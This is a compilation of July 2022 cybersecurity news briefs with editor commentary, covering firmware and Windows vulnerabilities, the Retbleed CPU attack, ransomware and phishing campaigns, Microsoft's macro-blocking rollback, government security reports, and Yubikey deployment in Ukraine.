Three vulnerabilities in UEFI (Unified Extensible Firmware Interface) firmware affect more than 70 models of Lenovo laptops. All three vulnerabilities are buffer overflow flaws that could be exploited to allow arbitrary code execution. Lenovo has made firmware updates available.

Note

  • The Lenovo site includes a table of models and which of the three vulnerabilities impact them. All 70 are impacted by CVE-2022-1892, a buffer overflow in the SystemBootManagerDxe driver. The fix, in all cases, is to update your firmware. In April Lenovo addressed three UEFI vulnerabilities with firmware updates. It’s a good time to make sure your entire fleet of Lenovo systems are running updated firmware.

Read more in

CISA Adds Another Flaw to Known Exploited Vulnerabilities Catalog

The US Cybersecurity and Infrastructure Security Agency (CISA) has added another vulnerability to its Known Exploited Vulnerabilities Catalog. The local privilege elevation vulnerability affects Microsoft Windows Client Server Runtime Subsystem (CSRSS). The flaw was fixed in Microsoft’s July Patch Tuesday earlier this week. Federal agencies have until August 2 to mitigate the vulnerability.

Note

  • The good news is the fix is in the July patch bundle. The bad news is this impacts client and server operating systems, through Windows 11/Server 2022, and is a zero-day to boot. While you’re already pushing out your client updates, you’re going to want to expedite your regression testing for server deployment.

Read more in

Microsoft Patch Tuesday

On Tuesday, July 12, Microsoft released fixes for more than 80 vulnerabilities. Four of the flaws are rated critical; one is being actively exploited. The zero-day privilege elevation flaw in Windows’ Client Server Runtime Subsystem (CSRSS) affects all supported versions of Windows. CISA has added the CSRSS flaw to its Known Exploited Vulnerabilities catalog.

Note

  • Overall, a pretty “average” patch Tuesday. The CSRSS vulnerability is already exploited, but it is “only” a privilege escalation vulnerability, so nothing to lose too much sleep over. Also note that Microsoft did release the new auto-patch in general release now. Maybe start experimenting with it to take the busy work out of patch Tuesday.
  • While it sometimes feels we can’t catch a break, it’s nice to see a fix released for all impacted platforms rather than having to wait for patches for different OS versions. The CSRSS vulnerability is a zero-day and allows an attacker to execute code as System. Note this update also includes another round of patches for the print spooler (CVE-2022-22022, CVE-2022-22041, CVE-2022-30206, and CVE-2022-30226) which can be leveraged to delete files or gain System privileges.

Read more in

Retbleed Speculative Execution Attack

Researchers from ETH Zurich have discovered a speculative execution attack that affects certain Intel and AMD processors. The attack could leak sensitive data. Dubbed Retbleed, the attack exploited the retpoline software defense, which was introduced in 2018 to mitigate speculative execution attacks. The researchers will present their paper at the Usenix conference in August.

Note

  • Spectre variant 2 is back – while it was argued that the retpoline mitigation to that attack was insufficient, it was countered that those attacks were impractical. This is that impractical attack. The good news is there are mitigations, and Windows systems are not vulnerable as they are by default using Indirect Branch Restricted Speculation. Mitigations for other operating systems come at a 12-28% overhead so research carefully before deploying.

Read more in

macOS App Sandbox Escape Flaw

A vulnerability in macOS could be exploited to bypass the operating system’s App Sandbox. Apple fixed the flaw in a security update on May 1. Microsoft detected the vulnerability while looking for ways to run malicious macros in Office docs on macOS; they notified Apple in October 2021. Microsoft has released proof-of-concept exploit code for the flaw.

Note

  • You’re not still treating your Macs as non-targeted are you? While we can chuckle about Microsoft finding a flaw in macOS, we need to quickly acknowledge that disclosure to Apple was made and fixes incorporated in the May 16 updates to Catalina, Big Sur and Monterey. Make sure those updates have been deployed, particularly as it’s going to get busy with iOS 15.6 likely next week and Ventura/iOS 16 in a couple of months.
  • So called “proof-of-concept” code should not be released; it lowers the cost of attack to the rogues. I, for one, am more than willing to take Microsoft’s word that there is a vulnerability, that it can be exploited, and should be mitigated. Microsoft should not lower the cost of attack against vulnerabilities in its competitors’ products. Rather it should focus on putting its own house in order.

Read more in

Tenet Healthcare Sued Over Data Theft

Tenet Healthcare and its Baptist Health System (BHS) affiliate are facing a $1M class action lawsuit over a cyberattack that led to patient data theft. The incident affected 1.2 million patients. The lawsuit alleges that the stolen data were not encrypted and that “BHS and its employees failed to properly monitor the computer network and IT systems that housed the private information.”

Note

  • The claim is hitting both on timely notification and encryption of sensitive data. HIPAA allows data to not be encrypted at rest if you have other mitigations; it will be interesting to see how this plays against that plan. Make sure that you’re prepared to notify users and/or partners in a timely fashion in the event of a breach. Take a moment to review contractual or regulatory requirements to make sure that you’re meeting those obligations. As to encryption, it’s become increasingly easy to encrypt at rest and in transit, make sure that you’ve not overlooked options to facilitate this not previously available, particularly for services you migrated to the cloud. Then document and track gaps.
  • These class action lawsuits after breaches have been tried many times over the past 10 years and they rarely seem to succeed. That may change in the future as the broad loopholes in regulations get narrowed at the state level, but I think today it is more important to convince CXOs and Boards that the cost of preventing or minimizing the damage from breaches is almost invariably less than incurring a breach – and cybersecurity insurance rarely changes that.

Read more in

Microsoft’s security update includes 84 vulnerabilities, one that’s exploited in the wild

Microsoft released its monthly security update Tuesday, disclosing more than 80 vulnerabilities in the company’s various software, hardware and firmware offerings, including one that’s actively being exploited in the wild. July’s security update features three critical vulnerabilities, up from one last month, still lower than Microsoft’s average in a Patch Tuesday. All the other vulnerabilities fixed are considered “important.” All three critical vulnerabilities allow remote code execution on Microsoft Windows Systems. Of these, Microsoft considers the exploitation of CVE-2022-22029, CVE-2022-22038 and CVE-2022-22039 less likely to occur. CVE-2022-22029 could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS). However, according to Microsoft, it has high attack complexity and would require repeated exploitation attempts through sending constant or intermittent data. Another critical vulnerability, CVE-2022-22038, is also considered to be more difficult to exploit because it requires undisclosed additional actions by an attacker to prepare the target environment for exploitation. CVE-2022-22039 iss another remote code execution flaw in Windows Network File System that requires an attacker to win a race condition to exploit it, making this vulnerability less likely to be exploited. Read more: Microsoft Patch Tuesday for July 2022 — Snort rules and prominent vulnerabilities

Adobe discloses critical vulnerabilities in Acrobat, Reader and Photoshop

Adobe released a large swath of patches for its products Tuesday, including disclosing 22 vulnerabilities in Adobe Acrobat Reader, some of which could lead to arbitrary code execution. Affected product versions include Acrobat DC, Acrobat Reader DC, Acrobat 2020, Acrobat 2017 and Acrobat Reader 2017. Cisco Talos discovered one of the vulnerabilities, CVE-2022-34230, a use-after-free issue that is triggered if the targeted user opens a PDF with specially crafted, malicious JavaScript. The code could give attackers control over reused memory, which can lead to arbitrary code execution. Read more: Adobe Patch Tuesday: Critical Flaws in Acrobat, Reader, Photoshop

Ransomware Payment Recovery Does Not Cover Costs of Attack

Maastricht University in the Netherlands has recovered cryptocurrency it paid after a ransomware attack in 2019. The €200,000 30 bitcoin payment in 2019 is now worth €500,000. Maastricht University says the net gain of €300,000 does not cover the costs associated with the attack.

Note

  • The obvious reaction from most NewsBites readers is, of course, “No Duh” or whatever the 2022 equivalent of that is. But, important to get across to management that no insurance payment, let alone any recovery of damages through legal means, ever covers the full cost of an incident and more importantly: the cost of avoiding most incidents is almost always less than the cost of suffering the incident.
  • The volatility of cryptocurrency worked in their favor this time. While it’s awesome to recover the payment, and I would jump on it if the opportunity presented itself, don’t assume recovering the ransom, including any increase in value, will come close to covering costs incurred to recover from an attack, particularly as some decryption programs provided by the attackers don’t work leading to the most resource intensive recovery option.
  • This is an important point that organizations should take into consideration when facing ransomware extortions, the cost of recovery is not just the ransom demand. It can also include the costs of replacing compromised devices, updating systems, dealing with forensic and other investigations, and so on. (Disclaimer: I am a guest lecturer at Maastricht University but had no involvement with this incident.)

Read more in

PyPI Mandates Two-Factor Authentication

The Python Package Index (PyPI) repository has begun rolling out a two-factor authentication (2FA) requirement for critical projects. Google’s Open Source Security Team has provided 4,000 Titan security keys to be given to eligible maintainers.

Note

  • The push-back from developers is interesting, and a good lesson for anybody rolling out 2FA in larger organizations. Developers contributing to PyPI are probably less likely to experience technical issues implementing 2FA than most organizations, and these developers are likely more aware than most about some of the issues with password-based authentication. But still, the extra complexity of 2FA was enough for some of them to rebel/refuse to participate.
  • It’s 2022. How have the other library management systems survived this long without requiring multi-factor? Having not been extremely into every library management system like this, it does make you question what the other managers are doing. Is this an oversight? Have threat actors been in these systems for years without tipping us off?
  • Good to see all the momentum and minimal (but not zero) pushback for stronger authentication in the software supply chain. Now is a good time to do a prototype test of 2FA within your organization, maybe just the security group and some security friendly IT admins. Find the trouble areas (there will be some) and develop, and get approved, plans for some level of 2023 rollout.
  • Nice move to incentivize the adoption of 2FA! Before you get too excited, note that the Titan keys are only authorized in Austria, Belgium, Canada, France, Germany, Japan, Spain, Switzerland, United Kingdom, and the United States. Other areas need either a FIDO U2F key or enable 2FA through a mobile app such as Google Authenticator, MS Authenticator, DUO Mobile, etc. Note that this simply prevents accounts being usurped by others, doesn’t ensure the integrity of the users who have the 2FA tokens.

Read more in

Windows Autopatch is Now Available

Microsoft has made Windows Autopatch available for all users with Windows Enterprise E3 and E5 licenses. Autopatch will automate the updates for Windows 10, Windows 11, Microsoft Edge and Microsoft 365.

Note

  • Windows Autopatch is an interesting option for larger organizations to manage the risk of patching. Note that this is an option, and not replacing the patch Tuesday we know and love. But it offers for free what many organizations are already doing in some form.
  • Per many previous comments, try it out – most organizations will see minimal breakage and take one more step towards basic security hygiene.
  • I would like to say “Yay, this is great,” like Chrome Automatic Updates, but we have seen problematic patches in the past. Will we see an enterprise or two go down because of a botched patched like we say when Antivirus vendors accidentally quarantine critical system services? Curious to see how this will go.
  • Make sure you understand how this applies to your business, as in what packages and license levels you need to enable the feature and is available both through as services from Microsoft to manage systems on a customer’s behalf (Windows Autopatch) or as part of Windows Update for Business and the Windows Update for Business deployment services. Start with a test set of systems to determine the impact, versus your prior update mechanisms. Note that this is directed to end-users (commodity systems) rather than server systems, where application of the updates requires a much lower level of regression testing and has become SOP.

Read more in

HHS OCR Will Improve Breach Reporting Process

The US Department of Health and Human Services (HHS) Office of Civil Rights (OCR) has agreed to improve its communication with entities that report breaches. A recent report from the Government Accountability Office (GAO) recommended that HHS “establish a feedback mechanism to improve the effectiveness of its breach reporting process.”

Note

  • This is part of the bill coming due as the health care world has moved (sloowly) to depending on and starting to realize the benefits of electronic health records. The Healthcare Information Portability and Accountability Act (HIPAA) in 1996 resulted in breach notification regulations giving 60 days for notifying impacted parties and HHS, obviously too long – very manual processes evolved from that. Tighter requirements would have driven the need to move away from manual, paper bound breach notification processes at least as fast as electronic health records moved.
  • Whether you’re having vulnerabilities or breaches reported to you, timely response is required. Additionally, don’t just file the information, make sure it is acted upon by qualified and empowered people. Without an effective response, those reporting are unlikely to continue to do so and may chose other ways of handling the information which may be far less desirable.
  • In incident response one of the most important things you can do is to learn from your own incidents, one of the other important things you can do is to learn from others’ security incidents. Hopefully, the HHS will provide feedback to individual organizations and sanitized feedback to others so that all organizations can improve their security from lessons learnt.

Read more in

Microsoft Temporarily Rolls Back Macro Blocking

Microsoft has temporarily rolled back its decision to block VBA macros in Office documents downloaded from the Internet. Office has been warning users about macros for the past six years, giving users an option to enable them. Earlier this year, Microsoft announced that it would begin automatically blocking VBA macros by default; the feature went live in June.

Note

  • The change was likely rolled back due to unintended business process impact. No matter what the source, users need to be trained to think twice, pause, and think again, before enabling macros in an Office document. Organizationally you can roll out the Microsoft Office group policy objects and enable the “Block macros from running in Office files from the Internet” policy setting. Note that a document’s properties could then be updated (file, properties, and click unblock in the security section and hit apply) to remove the “mark of the web” and macros would then be enabled. Only do this for trusted content.
  • The amount of chatter on Twitter and other social media over this is rather interesting. Many pen-testers and red team individuals are cheering and jeering at Microsoft’s decision to roll back. Cheering as Macros will still be somewhat available over the Office Ecosystem and Jeering because Microsoft had a chance to remove this vulnerability by default. What this will ultimately mean will be difficult to figure out, other than the “status quo” from here on out for the foreseeable future.
  • Had to manage a similar problem in IBM some forty years ago. Changing the default (the right “security” decision) broke applications all around the world. One can only sympathize. Notice and publicity can only marginally mitigate the pain.

Read more in

GAO to US Department of Energy: Improve Grid Cybersecurity

In a recent report, the US Government Accountability Office (GAO) listed 26 priority recommendations for the Department of Energy (DoE). The recommendations fall into eight categories, including improving cybersecurity and electricity grid resilience.

Note

  • The three cybersecurity recommendations are pretty high level, mostly focusing on risk assessment and management. Missing two key things: giving priority to achieving basic security hygiene in existing energy infrastructure and building security into evolving energy sources that are more distributed than the traditional infrastructure.
  • Some of the recommendations, while timely, need funding to have the intended benefits, particularly for specialized areas where finding workers with relevant skills may be difficult without sufficient incentives.
  • The hard part of improving grid security is changing the culture of the industry in which, the access of operators to those controls that they use to respond in real-time to component failures or imbalances between load and supply, trump cybersecurity and grid resilience.

Read more in

OMB is Developing Real-Time Zero-Trust Scoring

The US Office of Management and Budget (OMB) is developing a way to generate real-time zero-trust scores for network users. The effort is the agency’s response to the May 2021 Cybersecurity Executive Order, which directs federal agencies to adopt zero-trust cybersecurity principles and make necessary adjustments to their network architectures.

Note

  • In order to come close to something like “zero trust” you first need strong authentication in use and IT and security operations meeting basic security hygiene requirements around configuration and vulnerability management, privilege management, etc. So, realistically any scoring system should be showing near zero for several fiscal years, no hurry.
  • This appears to be about trusting users rather than systems and architectures, the hard part to see in real-time.

Read more in

L3Harris Will Not Pursue Purchase of NSO Group

L3Harris, a US defense contractor, has reportedly dropped its efforts to buy NSO Group, which makes Pegasus spyware and hacking tools. L3Harris began negotiations with NSO in June. The US Department of Commerce placed NSO on its entity blacklist in November 2021; the Biden administration recently raised security concerns about the potential purchase, which reportedly prompted L3Harris to call off its negotiations.

Note

  • SANS instructor Heather Mahalik, at the RSA Conference SANS New Threats and Attacks keynote panel, discussed why you need to look at the risks of “stalkerware” with Pegasus as the prime example. There is a need for intelligence community tools to track bad actors, really powerful stalkerware will always be used there and almost as powerful stalkerware will be used commercially, too – but done under the name of “marketing AI.” For really high value users, like CEO, CFO, board, etc. extraordinary protection will be required – see previous NewsBites comments on Apple’s LockDown feature coming for iPhones.
  • Counterintelligence concerns and suggestions should be factored in as risks in your decision-making process. This doesn’t mean you have to accept their recommendation; it means don’t discount it without careful consideration. Additionally, there are financial consequences for disregarding DOC sanctions, such as blacklisting an entity. The point is to make an informed decision rather than being blindsided by unintended consequences.

Read more in

GAO: DoD Needs to Mitigate Risks to Defense Industrial Base

A recent report from the US Government Accountability Office (GAO) recommends that the Department of Defense “develop… a robust strategy and measure… and report… on DOD-wide industrial base risk mitigation efforts.” The risks to Defense Industrial Base companies include weak physical and cybersecurity factors and reliance on foreign suppliers.

Note

  • The DoD has over 200,000 suppliers – a rising tide for security in the Defense Industrial Base will raise the security level of all vendors. Great example was when NIST put out encryption standard FIPS 140-1 in 2001 or so, it enabled browser security and the ability to at least do SSL with meaningful encryption. But progress really started to happen a few years later when OMB or GAO required all browser procurements to only use FIPS compliant products -and private industry benefitted enormously.
  • Supply chain security, to include single points of failure, and domestic vs foreign sources will continue to be on the radar for quite some time. Even if you’re not in the defense space, we’ve all learned about the potential consequences of remote or non-redundant suppliers over the last two years. Identify where you have similar dependencies and make sure that you have a plan B & C.

Read more in

New side-channel attack disclosed in Intel and AMD processors

Academics from ETH Zurich published details on Tuesday on a new side-channel attack that impacts modern CPUs from Intel and AMD. The research, named Retbleed, is the latest in a long line of side-channel attacks impacting speculative execution, a feature of modern CPUs where the processors perform data computations in advance as a way to gain processing speed.

In early 2018, academics from different organizations revealed the first two vulnerabilities that take advantage of speculative execution operations by looking at the data that gets processed or discarded during this process, data that can sometimes contain sensitive secrets.

Other side-channel attacks were subsequently discovered, but those initial vulnerabilities, known as Meltdown and Spectre, changed how all major chipmakers looked at CPU design and data security.

One of the defenses that chipmakers and software vendors came up with at the time was a new technique called Reptoline that effectively tried to replace indirect jump and call instructions in the CPU with return instructions since, at the time, return instructions were considered safe from Meltdown and Spectre-like side-channel attacks.

But in their Retbleed research published this week, the ETH Zurich team says they were able to carry out a side-channel attack against modern CPUs through return instructions for the first time, leaking kernel memory containing password hashes from Linux systems.

The researchers said they tested the Retbleed attack in practice on AMD Zen 1, Zen 1+, Zen 2, and Intel Core generation 6–8, but, in theory, AMD CPU families 0x15–0x17 and Intel Core generation 6–8 are all likely affected. In layman’s terms, this means that Intel CPUs 3 to 6 years old, and AMD processors 1 to 11 years old, are likely to be affected.

The good news is that since the original Meltdown and Spectre disclosures, chipmakers and OS vendors now have protocols established for dealing with bugs like this in a more timely manner. While fixing Meltdown and Spectre took months and several tries, the ETH Zurich team said that patches for Retbleed have already been prepared and went out during the July 2022 Patch Tuesday, via both OS and cloud infrastructure updates from all the major providers. Compared to the uncertainty during the Meltdown and Spectre days, all users have to do these days is update their operating system.

Retbleed patches for AMD processors are tracked as CVE-2022-29900, while the Intel fixes are CVE-2022-29901, with additional mitigation information from Intel being available through their blog as well.

ETH researchers noted that installing these patches will have an impact on the CPU’s performance metrics between 14% and 39%, and another issue they found in AMD processors that they named Phantom JMPs (CVE-2022-23825) might even come with a 209% performance overhead.

Concerns about this performance hit will most likely result in many people not installing the patches to protect themselves against “exotic attacks” that are unlikely to be seen in the wild, at least yet.

In some ways, this side channel research is similar to the first cryptography attacks from the 90s and early 2000s, all of which broke smaller pieces of various cryptographic operations, with each new research building on top of the previous work until. At a certain point, major cryptographic algorithms started falling.

And the true risk here is difficult to assess since detections for side-channel attacks don’t really exist. It’s easy to say something isn’t in the wild when you’re not looking for it.

So, while the side-channel attacks of today may seem “exotic” and “impractical” to some, this type of research tends to be cumulative. Eventually it’ll have enough weight for attackers to bother with it. Meanwhile, we’d do well to pay attention to this sort of work and use it to move the needle on CPU design and security.

Uniswap phishing campaign

Customers of the Uniswap crypto-exchange have lost millions of US dollars worth of cryptocurrency following a phishing campaign that took place over the past few days. According to early estimates from blockchain security firm SlowMist, the losses are currently estimated to be around 7,500 ETH, worth more than $8 million, The Record and Check Point reported.

ECB incident

The European Central Bank said on Tuesday that its president, Christine Lagarde, was targeted in an attempted cyberattack. The ECB said it quickly identified and stopped the attack and that no information was compromised as a result. According to a report, Mrs. Lagarde was allegedly contacted by the attacker via an SMS message that appeared to come from former German Chancellor Angela Merkel, asking her to initiate a conversation via WhatsApp. Mrs. Lagarde discovered the ruse after calling the real Mrs. Merkel to confirm.

Microsoft clarifies VBA macro block rollback

After getting blasted by literally everyone in the cybersecurity industry last week, Microsoft said that its decision to roll back a security-related change (the blocking of VBA macros in Office apps) is only a temporary solution and that the company intends to eventually re-enforce the VBA macro block—although the company did not say when. [Additional coverage in The Record]

Windows Autopatch

Microsoft has formally launched its Windows Autopatch service, a feature for its enterprise customers that could be used to automate the installation of Windows updates on large fleets of PCs. Windows Autopatch is now available for Microsoft customers with E3 and E5 licenses.

Windows Autopatch

IBM knee-caps Rumble & RT

US tech giant IBM has pulled its services for US right-wing video portal Rumble. The company moved to deplatform Rumble after an inquiry from Cyberscoop’s AJ Vicens, who asked why IBM was helping RT air its propaganda through its Rumble accounts.

IPv4 address price doubles in a year

The price of an IPv4 address has almost doubled over the past year, according to SIDN, the Netherlands’ official domain registrar. Prices have gone up from only $5/IP in 2015 to $25-$30 last year and $50-$60 today, showing the growing scarcity in the IPv4 market.

IPv4 address price doubles in a year

Germany rethinks its approach to cybersecurity

The German Federal Ministry of the Interior has published its plan to revamp the country’s approach to cybersecurity. Among the proposed changes are initiatives to move the responsibility for the country’s cyber-security defense from local state governments to the federal government’s BKI agency, as well as giving German agencies the power to respond to cyberattacks. The new plan will go under public debate and needs to pass through the German Parliament.

US has an outdated view of the internet

A report published by the Council on Foreign Relations this week urges the US government to confront and rethink its current view of the global internet as a fragmented network controlled by multiple aggressive states and not the global utopian collaboration network the US government first envisioned 40 years ago. The CFR argues that the internet has become a haven for corporate and government espionage, political manipulation through disinformation and misinformation campaigns, and various criminal activities. CFR officials urge Washington to work with allies to protect as much as possible the openness of the current internet while also cracking down on its negative parts, with some proposals like:

  • Adopt a shared policy on digital privacy, interoperable with the EU’s GDPR.
  • Resolve outstanding issues on US-European Union (EU) data transfers.
  • Create an international cybercrime center.
  • Declare norms against destructive attacks on election and financial systems.
  • Negotiate with adversaries to establish limits on cyber operations directed at nuclear command, control, and communications (NC3) systems.
  • Develop coalition-wide practices for the Vulnerabilities Equities Process (VEP).
  • Adopt greater transparency about defend-forward actions.
  • Hold states accountable for malicious activity emanating from their territories.
  • Clean up US cyberspace by offering incentives for internet service providers (ISPs) and cloud providers to reduce malicious activity within their infrastructure.
  • Address the domestic intelligence gap, and more.

China to enforce new data export rules

The Chinese government passed new legislation last week that introduced new rules for companies that send the data of Chinese citizens to servers abroad. Any Chinese tech company that has sent the data of more than 100,000 Chinese citizens abroad will be subject to audits and security audits by the

Chinese Cybersecurity Authority (CAC). The CAC will primarily check if companies took steps to protect the exported data against hacks, interception, or tampering. The new law will enter into effect on September 1, 2022, but will apply retroactively to all companies that have exported user data abroad after January 1, 2021.

BianLian ransomware group

Threat intelligence company BetterCyber has discovered a new ransomware group named BianLian, which also operates a leak site on the dark web, where it publishes data from victims who refuse to pay.

Lilith

Another new ransomware gang that made its presence felt this month is a group called Lilith. This is now the sixth new major ransomware gang that has popped up on the scene in the past month after Cheers, Yanluowang, 0mega, RedAlert, and BianLian.

NWGEN

A new threat actor calling itself NWGEN appears to have split from the LAPSUS$ gang and is carrying out new attacks. According to Microsoft’s Christopher Glyer, the group uses the same tradecraft used by the original LAPSUS$ gang, which should make it easier to detect and mitigate possible attacks on targeted organizations. Per Kevin Beaumont, NWGEN appears to be dabbling in ransomware too, which is super bad news for some orgs.

Reverse proxy phishing

Microsoft has published a report on a large-scale phishing campaign that used reverse proxy servers for its phishing sites. This technique, also known as adversary-in-the-middle (AiTM) phishing, allowed the threat actors to obtain not only credentials from victims but also the authentication cookies that are generated after victims go through a legitimate 2FA challenge. Microsoft said this campaign has been running since September 2021, has hit more than 10,000 organizations, and has been linked to several BEC attacks.

Overview of AiTM phishing campaign and follow-on BEC

AiTM phishing website intercepting the authentication process

AiTM phishing campaign and follow-on BEC in the context of Microsoft 365 Defender threat data.

Nigerian threat actor

The team at DomainTools published a report this week on the activities of a Nigerian threat actor, which they linked to an extensive campaign to impersonate medical institutions in the US with the aim of fraudulently procuring medical equipment from the manufacturers in the name of hospital systems.

AlphV evolves

The operators of the AlphV (BlackCat) ransomware have launched a dedicated section on their leak site that allows anyone to search through all the data they stole and leaked from past victims. More in this Resecurity report.

AlphV evolves

Threat actor impersonates cybersecurity firms

Crowdstrike said it identified a threat actor carrying out a phishing campaign that impersonated various prominent cybersecurity companies. Crowdstrike wasn’t able to specifically identify the threat actor behind this operation but says various operational details suggest this threat actor uses tactics similar to those of the Wizard Spider (Conti) group.

Hagga group

Team Cymru published a report on the backend infrastructure of Hagga, a threat actor that has been known to distribute infostealers since the start of 2020. The group is also known as Aggah in some reports.

Read more

Coinminers targeting MSSQL servers

The DFIR Report team published a technical analysis on Monday on a brute-force campaign targeting the admin accounts of MSSQL database servers. The researchers said the goal of this campaign is to compromise databases and then deploy a cryptocurrency-mining app to generate profits for the attackers.

Coinminers abuse GitHub Actions and Azure VMs

A report we missed from last week is one from Trend Micro, which uncovered a coinminer gang abusing GitHub Actions to mine cryptocurrency using Azure VMs on compromised cloud infrastructure.

Hive v5 decrypter

A security researcher named reecDeep has released a free tool that can help victims that had their files locked by version 5 of the Hive ransomware recover their files. Previously, South Korea’s cyber-security agency KISA released decrypters for the first four versions.

ChromeLoader

Palo Alto Networks published a report on Tuesday on ChromeLoader (also known as Choziosi Loader and ChromeBack), a malware strain that appeared in January this year and which works by infecting the settings of Chrome browsers to hijack search queries and redirect users to malicious sites. Another report on this threat is also available from Red Canary.

UAC-0056

In a security alert published on Monday, Ukraine’s CERT team said that it detected a new spear-phishing operation carried out by a Russian threat group known as UAC-0056. This campaign is being carried out from hacked Ukrainian government accounts and aims to infect recipients with Cobalt Strike beacon backdoors.

Disinformation efforts in May

The Google TAG team has published its actions against disinformation efforts that took place on Google services in the month of May 2022. TAG said actions were taken against accounts linked to threat groups operating out of China, Iran, and Russia.

New Intrusion Truth revelations coming

Intrusion Truth, the mysterious group that has doxed the identities and real-life affiliations of at least four Chinese cyber-espionage groups, hinted on Tuesday that they have a new report coming out soon.

New AWS IAM Authenticator vulnerability

Gafnit Amiga, a security researcher with Lightspin, discovered a new authentication bypass in the AWS IAM service, a vulnerability that could be used to access AWS customers’ Kubernetes instances. In a security bulletin on Monday, AWS said it fixed the issue at the end of June when it rolled out fixes for all impacted servers. The vulnerability is currently tracked as CVE-2022-2385.

Microsoft Patch Tuesday

The Microsoft Patch Tuesday security updates for the month of July 2022 are officially out. This month, Microsoft fixed 86 vulnerabilities across several products, including CVE-2022-22047, an elevation of privilege vulnerability that was exploited in the wild before the company’s patches.

Bad Azure vulnerability

Among the fixes included in this month’s Patch Tuesday is also a vulnerability in Azure Site Recovery, a service that provides disaster recovery options for cloud resources. Tenable says that this bug—tracked as CVE-2022-33675—can allow threat actors to gain SYSTEM-level privileges on cloud instances where this service is installed. Microsoft said it released Azure Site Recovery 9.49 to address this and other security issues.

MitM on FreshWorks

Vulnerability researchers from Visma’s Red Team have uncovered a serious zero-interaction vulnerability in the FreshService inventory management software. The vulnerability makes it possible for malicious third parties to perform a man-in-the-middle attack on FreshService inventory management agents and deploy malicious updates that can run with administrative privileges on the affected systems.

Kubernetes NGINX Ingress Controller vulnerabilities

The team at Lightspin has published an overview of four recent vulnerabilities in the Kubernetes NGINX Ingress Controller that have been disclosed since October last year. One of the vulnerabilities, CVE-2021-25742, also came under active exploitation.

Other security updates

Besides Microsoft, other companies that recently released security updates also include the Android project, Cisco, Intel, Adobe, VMWare, Citrix, and SAP.

Android zero-day

Unfortunately, a vulnerability in the Android kernel used on Google smartphones that was disclosed on Twitter last week did not receive a patch. According to Android Police, Google didn’t patch the issue because they didn’t know about it, as the researcher did not notify the company before their tweet.

A MITRE Advisory Accidently Included Live Vulnerable Instances

A MITRE advisory came out recently regarding insecure camera admin interfaces, but rather than the references section just including more information about the vulnerability, it also included a list of vulnerable internet-accessible instances. Read more: Security advisory accidentally exposes vulnerable systems

Apple Introduces “Lockdown Mode” for Likely Spyware Targets

In iOS 16, Apple is introducing a new feature that locks down one’s device against targeted attacks. The primary use cases are people like reporters or high-ranking officials being hit with spyware created by companies like NSO Group. The tool works by disabling functionality within multiple parts of a device, including attachment types in Messages, certain JIT web technologies, incoming communication prompts like FaceTime, wired connections when locked, and the installation of configuration profiles. I say Bravo to Apple on this one, and I can’t wait to see someone take the future steps here of monitoring one’s threat level and adjusting such things dynamically. Read more: Why Lockdown mode from Apple is one of the coolest security ideas ever

FBI and MI5 Say China Steals Constantly and Massively

Speaking at a venue for business leaders, the MI5 and FBI leaders said China is our most serious threat to our intellectual property. “The most game-changing challenge we face comes from the Chinese Communist Party. It’s covertly applying pressure across the globe.” The FBI director went on to say the Chinese hacking program was “lavishly resourced” and “bigger than every other country combined.” Read more: FBI and MI5 bosses: China cheats and steals at massive scale

The Pentagon is Running a Paid Bounty

The Pentagon has been running klout-based bounty programs for a while now, but between July 7th and July 11th they’re paying out up to $110,000 to people who find bugs. They’re paying $500 for highs and $1,000 for criticals. They’ve also said they’ll pay up to $5,000 for really serious issues. Read more: Pentagon: We’ll pay you if you can find a way to hack us

Researchers Have Found a Way to Detect Deepfakes Using Lighting Variations

Researchers at NSA and Cal Berkeley have found a way to detect Deepfakes using lighting variations. They introduce an element on the screen that changes a narrow band of color faster than most Deepfake systems can respond. Read more: Detecting Deepfake Video Calls Through Monitor Illumination

Myanmar’s Authoritarian Government Implements Chinese Surveillance Tech

Myanmar’s Junta government is expanding its installations of Chinese-made surveillance cameras with built-in facial recognition. The plans are being sold as “safe city projects”, as one does. Read more: Exclusive: Myanmar’s junta rolls out Chinese camera surveillance systems in more cities

Iran Announces 20% Enrichment of Uranium

US President Biden is heading to Iran this week and Iran has just released a report saying they’re consistently producing Uranium at 20% enrichment levels at its underground Fordo facility. 20% is a big step towards the 90% needed for weapons-grade uses, but they evidently already have enough 60%-enriched matter for a single bomb if they choose to make one. Read more: Iran enriches to 20% with new centrifuges at fortified site

Arizona Makes It Illegal to Film Within 8 Feet of Police

Arizona has passed a law making it illegal to film police within 8 feet. Lots of freedom-advocacy groups are upset with this law, but I’m happy that it seems to imply it’s ok to do so from 9+ feet away. I mean, 8 feet is pretty damn close to be to anyone you’re not hanging out with, in most situations. I do worry about it being the cop’s word vs. the filmer when it comes to distance, though.

Thousands of Yubikeys have been deployed in Ukraine, more to come

More than 16,000 Yubikeys have been deployed to Ukrainian government executives, workers, and employees of private companies in Ukraine’s critical sectors in the aftermath of Russia’s invasion.

The initiative is spearheaded by Hideez, a Ukrainian security firm specializing in identity services and FIDO consultancy. Earlier this spring, the company secured a donation of 30,000 Yubikey security keys from hardware authentication device maker Yubico.

Since then, Hideez’s staff has been working with Ukrainian government agencies like the Ministry of Digital Transformation, the National Security and Defense Council, and the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) to ensure the devices can be imported into the country, that government infrastructure is prepared for the keys’ rollout, and that recipients receive the necessary training.

The idea is that once government and critical sector workers have a security key as an extra layer of protection, their accounts would be safe from the onslaught of spear-phishing attacks constantly hitting their inboxes every day.

“We got Yubikey certified, so they are allowed to be deployed into Ukraine instances,” Yuriy Ackermann, VP of War Efforts at Hideez, told Risky Business News in a call last week.

“We have quite a few ministries that have moved a lot of their stuff to G Suite and Azure—with them is quite easy; we just give them a key. We made instructions in Ukrainian, video instructions, and so on. […] So, it’s really fast.

“We had a department that pretty much moved to using FIDO, like 500 people, in less than a week because they just needed to understand their policies, read our documentation, and that’s it, they just give the keys and roll them, and voila,” Ackermann said.

But efforts are also underway to roll out the keys to individuals in other departments, including those without the proper server-side infrastructure. In these cases, Ackermann says Hideez has been providing the government with the company’s solution at minimal costs.

Right now, security keys have been deployed to several government departments and companies in the logistics, energy, and telecommunications sectors. But plans go much further.

“Anything without what the country would fall apart is pretty much on top of our bucket list to work with,” Ackermann said.

Ackermann said Hideez’s goal is to deploy 100,000 security keys and maybe, in the distant future, reach a milestone of 1 million security keys deployed to government and critical infrastructure sector—making Ukraine the most cyber-secure country in the world.

